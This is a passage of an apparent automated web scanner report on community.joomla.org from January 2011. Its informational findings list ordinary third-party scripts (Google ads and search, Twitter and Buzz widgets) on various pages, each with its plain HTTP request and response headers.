  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.27. http://community.joomla.org/events/34-event-news/1393-joomla-16-release-party-in-pune-india.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /events/34-event-news/1393-joomla-16-release-party-in-pune-india.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/34-event-news/1393-joomla-16-release-party-in-pune-india.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25732


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.28. http://community.joomla.org/events/joomla-days/1343-joomla-day-chile-2011.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /events/joomla-days/1343-joomla-day-chile-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/1343-joomla-day-chile-2011.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.29. http://community.joomla.org/events/joomla-days/1394-joomladay-the-netherlands-2011.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /events/joomla-days/1394-joomladay-the-netherlands-2011.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/1394-joomladay-the-netherlands-2011.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.30. http://community.joomla.org/events/joomla-days/975-joomladay-charter.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /events/joomla-days/975-joomladay-charter.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /events/joomla-days/975-joomladay-charter.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.31. http://community.joomla.org/featured-articles.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /featured-articles.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.32. http://community.joomla.org/featured-articles/1070-vulnerability-list-update.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /featured-articles/1070-vulnerability-list-update.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/1070-vulnerability-list-update.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.33. http://community.joomla.org/featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.34. http://community.joomla.org/featured-articles/did-you-know.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /featured-articles/did-you-know.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /featured-articles/did-you-know.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.35. http://community.joomla.org/gsoc2009.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /gsoc2009.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /gsoc2009.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.36. http://community.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /index.php HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.37. http://community.joomla.org/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /login.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /login.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.38. http://community.joomla.org/showcase/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /showcase/ HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.39. http://community.joomla.org/showcase/how-to-submit-a-site.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/how-to-submit-a-site.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /showcase/how-to-submit-a-site.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.40. http://community.joomla.org/showcase/sites-of-the-month.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites-of-the-month.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /showcase/sites-of-the-month.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.41. http://community.joomla.org/showcase/sites/advsearch.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/advsearch.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /showcase/sites/advsearch.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
